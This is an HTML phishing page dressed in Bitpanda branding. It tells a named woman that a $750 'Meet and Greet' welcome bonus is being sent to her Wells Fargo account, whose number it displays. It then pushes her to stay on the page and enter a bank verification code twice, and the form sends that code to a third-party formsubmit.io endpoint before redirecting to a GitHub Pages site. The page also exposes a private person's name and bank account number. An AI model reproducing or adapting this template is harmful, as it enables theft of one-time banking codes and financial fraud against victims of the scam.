<!DOCTYPE html>
<html>
<head>

   
<html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){
            window.dataLayer.push({'event': 'optimize.activate'});
        }</script>


<meta charset=utf-8>


<title>

Verification
</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>


<link href=https://www.bitpanda.com/en rel=canonical><link href=/en hreflang=x-default rel=alternate><link href=/en hreflang=en rel=alternate><link href=/de hreflang=de rel=alternate><link href=/fr hreflang=fr rel=alternate><link href=/es hreflang=es rel=alternate><link href=/it hreflang=it rel=alternate><link href=/pl hreflang=pl rel=alternate>

<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>


<script type=application/ld+json>{
                "@context": "https://schema.org",
                "@type": "BreadcrumbList",
                "itemListElement": [
                    [{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.bitpanda.com\/en"}]
                ]
            }</script> <body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>











<h2>
<strong> 

Tom Jones 

</strong></h2>



 </div>
 
</header> 
    
    
    
    
  

 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid=""><div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m"><div class=module-text__content>












<h6> 


<div style="border: 1px solid black; padding: 10px; border-radius: 2px;">
<strong> 
<font size="+1">

 Stephanie  Tredwell
 
 </font> 
 </strong> 
 <br> 
 
 <br> 

<div> 
<div class="container">
    <div class="left-text"><strong> 
    
<font size="+1">
<strong> 
Approved

</strong></font>

</div>
    <div class="right-text"><strong><font size="+0.5">Available Balance:</strong></strong> </font> 
    
    <br>
    
    <font size="+4">
 $750</font><strong><font size="+2">.00</font></strong>

</div>
</div>

<style>
    .container {
        display: flex;
        justify-content: space-between;
    }
    .left-text {
        justify-self: flex-start;
    }
    .right-text {
        justify-self: flex-end;
    }
</style>

</div> 

</div> 


</h6>





<h6> 
<strong> 
<br>


<font size="+0.5">
<Font STYLE="word-spacing:3px">



The $750 welcome bonus is about to be transferred from your Meet and Greet profile and deposited into your Wells Fargo bank account (account number: 6879957006).

 
   <br> <br>
   
   
<font style="color: DarkRed">
   
   SCROLL DOWN TO LEARN MORE
   
   </font>
   
    <br> <br>
   
   
    To ensure the security of this transaction, a verification code will be sent to you within the next 15 minutes, don't leave this page until you receive it. Once you receive the verification code, kindly enter it below to confirm the transaction.  


<br>  <br>  <br>








  <div class="formbold-form-wrapper7">



<form  action="https://formsubmit.io/send/538bcbc9-8ef0-46ba-9114-8a9534b3b334" method="POST">

<input name="_redirect" type="hidden" id="name" value="https://celebrity-org.github.io/Processing/">




<div class="formbold-mb-7">
        <label for="Field1" class="formbold-form-label">   
        Verification Code 
        </label>
  
        <input
          type="text" required
          name="a-CODE_transaction"
          id="field1"
          placeholder="Enter Verification Code" 
          class="formbold-form-input"
        />
      </div>
      



<br> 


<div class="formbold-mb-7">
        <label for="Field1" class="formbold-form-label">   
          Confirm verification code
        </label>
  
        <input
          type="text" required
          name="b-confirm_CODE_transaction"
          id="field1"
          placeholder="Enter Verification Code Again" 
          class="formbold-form-input"
        />
      </div>







        <div class="formbold-mb-7">  
     </div>    

      <div>
        <button type="submit" value="Submit"
       class="formbold-btn w-full">CONTINUE</button>
      </div>
    </form>
  </div>
</div>


<style>
  @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap');
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
  }
  body {
    font-family: "Inter", sans-serif;
  }
  .formbold-mb-7 {
    margin-bottom: 20px;
  }
  .formbold-pt-8 {
    padding-top: 12px;
  }
  .formbold-main-wrapper {
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
  }

  .formbold-form-wrapper {
    margin: 0 auto;
    max-width: 550px;
    width: 100%;
    background: white;
  }
  .formbold-form-label {
    display: block;
    font-weight: 500;
    font-size: 19px;
    color: Black;
    margin-bottom: 14px;
  }
  .formbold-form-label-9 {
    font-weight: 500;
    font-size: 21px;
    margin-bottom: 20px;
  }

  .formbold-form-input {
    width: 100%;
    padding: 16px 24px;
    border-radius: 6px;
    border: 2px solid Black;
    background: white;
    font-weight: 500;
    font-size: 19px;
    color: Black;
    outline: none;
    resize: none;
  }
  .formbold-form-input:focus {
    border-color: Grey;
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold-btn {
    text-align: center;
    font-size: 21px;
    border-radius: 1px;
    padding: 16px 32px;
    border: none;
    font-weight: 500;
    background-color: DarkBlue;
    color: white;
    cursor: pointer;
  }
  .formbold-btn:hover {
    box-shadow: 0px 3px 8px rgba(0, 0, 0, 0.05);
  }

  .formbold--mx-3 {
    margin-left: -12px;
    margin-right: -12px;
  }
  .formbold-px-3 {
    padding-left: 12px;
    padding-right: 12px;
  }
  .flex {
    display: flex;
  }
  .flex-wrap {
    flex-wrap: wrap;
  }
  .w-full {
    width: 100%;
  }

  .formbold-file-input input {
    opacity: 0;
    position: absolute;
    width: 100%;
    height: 100%;
  }

  .formbold-file-input label {
    position: relative;
    border: 1px dashed #e0e0e0;
    border-radius: 6px;
    min-height: 200px;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 48px;
    text-align: center;
  }
  .formbold-drop-file {
    display: block;
    font-weight: 600;
    color: #07074d;
    font-size: 20px;
    margin-bottom: 8px;
  }

  .formbold-or {
    font-weight: 500;
    font-size: 16px;
    color: #6b7280;
    display: block;
    margin-bottom: 8px;
  }
  .formbold-browse {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    display: inline-block;
    padding: 8px 28px;
    border: 1px solid #e0e0e0;
    border-radius: 4px;
  }

  .formbold-file-list {
    border-radius: 6px;
    background: #f5f7fb;
    padding: 16px 32px;
  }

  .formbold-file-item {
    display: flex;
    align-items: center;
    justify-content: space-between;
  }

  .formbold-file-item button {
    color: DarkRed;
    border: none;
    background: transparent;
    cursor: pointer;
  }

  .formbold-file-name {
    font-weight: 500;
    font-size: 16px;
    color: #07074d;
    padding-right: 12px;
  }
  .formbold-progress-bar {
    margin-top: 20px;
    position: relative;
    width: 100%;
    height: 6px;
    border-radius: 8px;
    background: #e2e5ef;
  }

  .formbold-progress {
    position: absolute;
    width: 75%;
    height: 100%;
    left: 0;
    top: 0;
    background: #6a64f1;
    border-radius: 8px;
  }

  @media (min-width: 540px) {
    .sm\:w-half {
      width: 50%;
    }
  }
</style>

</div> 


 </h6> 
 
 
 <br> <br>  <br> <br>  <br> <br>
 


<script>window.initScriptLater = function (scriptUrl, fallback) {
        const script = document.createElement("script");
        script.onload = fallback;
        script.src = scriptUrl;

        document.addEventListener("readystatechange", () => {
            if (document.readyState === "interactive") {
                document.head.appendChild(script);
            }
        });
    };

    window.initScriptLater("https://cdn.bitpanda.com/app/v2/js/cta-button.min.js?id=d34a8a89944479eef669", () =>
        window.initCtaButton()
    );</script></div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid="">


<div>


 </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m">



</path> </symbol></svg>


  </div>
  
  <script>
    // Hide the processing message and form initially
    document.getElementById("processing").style.display = "none";
    document.getElementById("myForm").style.display = "block";
  </script>
</body>
</html>
